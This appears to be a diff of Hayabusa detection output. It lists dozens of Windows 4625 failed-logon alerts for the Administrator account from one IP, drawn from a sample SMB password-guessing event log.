+2016-09-20 01:50:33.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aOyLWd5CAAjnJt3C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.240 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s7gI55uWlshCLw3y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l7UogJ8bBw6Epbht | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIl0QRFHXCVAHWdV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OxPv9v4TxFvS9JMy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uHMGfCorrLXpDyeD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KQTKgFibIa8NWExO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.492 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rEnx3upH3Om0wHn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KlNbW1ljPSTdgUKY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w2WMd3HugfjSwJPJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yEy0C6dMhysbNDrX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxlayd8pnAZ3dZ2Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PhKO1jyWqVEdC9w2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.736 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dAH2mHJ4ZK5GS2p0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lV2ZIWGGwlkyEMRB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.811 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sum2yMFio9KLwZk5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fICXSRvv9Vm0uVpY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.894 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IgrOk6Fjp0QtfJ3i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OPKoHLtxNoiG65sl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NctXRH1DR3slfVxQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vLnAs36K1mTivu2w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H7crZQ0eQ5RDNIp7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yHjgGhEtZgNwjaii | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5gi2SS2mQiDylQ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kqWJGguiWBEplJiZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RWP4luPa3lFolQVI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5K9DQWbzslRZZMSC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5qm0L113v24jlfjx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.360 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seuUjyGmNlyYT4tU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FljAF4LWLmWNa3kL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.447 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RnN5mBOaAvYu25G7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: llBt31S46QVzg0Ki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1rvJUZo91Kka0G1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Zqi86ZSFGRnoFM4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GeyeVdCUmHEKxR8f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DwxJVXt79KBZalqS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TDfRu1OTlHmyc38P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OLCAMPDWti9hjHtV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.833 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k2eViuJeorX2peGP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: davOE9p1fF2LbDP7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.922 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YFQsEbZnm94eSuUl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UnNcBIPoWdJH0x7M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.997 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Fw1xVFyar0Cal2J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.040 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FWzn4Oa8PQdH9Gqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b68beIB5BKyMv8d3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HeXSJhEXzpiRX8BT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.169 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BQ8Zu7ByLWddD4Tk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: paQzUptV8scmJvsG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.234 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WQLsoIX9LPvbockz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRYbdVMbUlqFK8oM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OSO730O1fxDL4DfQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5wmniv339HLGKB4u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rO3mxvgSES0lVN34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.433 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fvK9k9tnCq5hwBqe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ujFfMT6I6L8OHag9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.517 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FWKY2Wh21sePUR1L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.562 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6E6yf8D5cPOEwR0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OpFho8k52BkBlg4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucDvfSfDYZzjNWFS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vnq3S0gEE98xfYLv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seVfaEdAS6lEXgkG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gz8BQAlyYXB61tx3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkHLs6yikRWVjj9F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0bQUcnUBCmE81G6I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BceDCcXoHJQv9pDi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GCCLt49g8wmAMEyV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pM6C8KRcxVIUsZrZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fw5DU6l3QRVl9cWY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37UthbuO3m4Lr7dU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: URB7Ji5pQleLtvy4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.101 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: orP9OgiBrYIKZPXE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZwvdnlIWhqoDg8On | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v6dXVbmLBpXc39ah | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Mu7amiHAg0l7bza | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
